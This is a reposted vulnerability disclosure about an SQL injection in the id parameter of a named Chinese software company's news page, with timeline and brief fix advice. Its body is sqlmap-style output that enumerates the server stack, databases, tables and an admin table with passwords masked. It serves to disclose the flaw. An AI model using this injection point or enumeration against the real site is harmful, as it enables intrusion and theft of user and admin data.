神刀安全网

漏洞标题: 银禾软件又一注入/

漏洞详情

披露状态:

2016-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

能查数据库,管理员账号密码,明文存储密码

详细说明:

漏洞地址:

code 区域
http://www.yinhoo.com/news.php?id=41

数据库:

code 区域
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] huiwang
[*] information_schema
[*] test
[*] yilinwebdb
[*] yinhoowebdb

code 区域
Database: huiwang
[25 tables]
+---------------------------+
| user |
| action_log |
| ad_items |
| ad_product |
| adcolumn |
| admin |
| alimama_items |
| apply |
| apply_user_info |
| backend_user_view |
| dictionary |
| image |
| menus |
| menus_score_text |
| product |
| product_columns |
| product_event |
| product_graded_info |
| product_preferential |
| rss_users |
| tag |
| tag_type |
| user_addFavorite_products |
| user_columns |
| visit_log |
+---------------------------+
Database: yilinwebdb
+------------------+---------+
| Table | Entries |
+------------------+---------+
| subscriptioninfo | 1407 |
| menus | 41 |
| news | 14 |
| faqs | 13 |
| banners | 4 |
| clientcommend | 3 |
| webinformation | 3 |
| subscription | 2 |
| `user` | 1 |
+------------------+---------+
Database: yinhoowebdb
+------------------+---------+
| Table | Entries |
+------------------+---------+
| subscriptioninfo | 1642 |
| menus | 98 |
| news | 13 |
| banners | 10 |
| clientcommend | 4 |
| webinformation | 3 |
| subscription | 2 |
| `user` | 1 |
+------------------+---------+
Database: huiwang
Table: admin
[2 entries]
+---------+----------+-----------+----------+----------------------+----------------------+-------------+---------------------+---------------------+------------------+
| type_id | admin_id | status_id | password | admin_name | login_email | create_user | create_time | last_update_time | last_update_user |
+---------+----------+-----------+----------+----------------------+----------------------+-------------+---------------------+---------------------+------------------+
| 1 | 1 | 0 | *** | hui_admin | [email protected] | NULL | 2013-06-14 14:53:57 | 2013-06-14 14:53:57 | NULL |
| 3 | 42 | 0 | *** | [email protected] | [email protected] | NULL | 2013-06-14 16:07:13 | 2013-06-14 16:07:13 | NULL |
+---------+----------+-----------+----------+----------------------+----------------------+-------------+---------------------+---------------------+------------------+

其他具体数据就不再查了

漏洞证明:

如上

修复方案:

1.数字型使用 intval() 函数过滤

2.改密码

3.也可下载安全狗,加速乐,或其他安全软件

版权声明:转载请注明来源 灰灰灰阔@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 银禾软件又一注入/

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址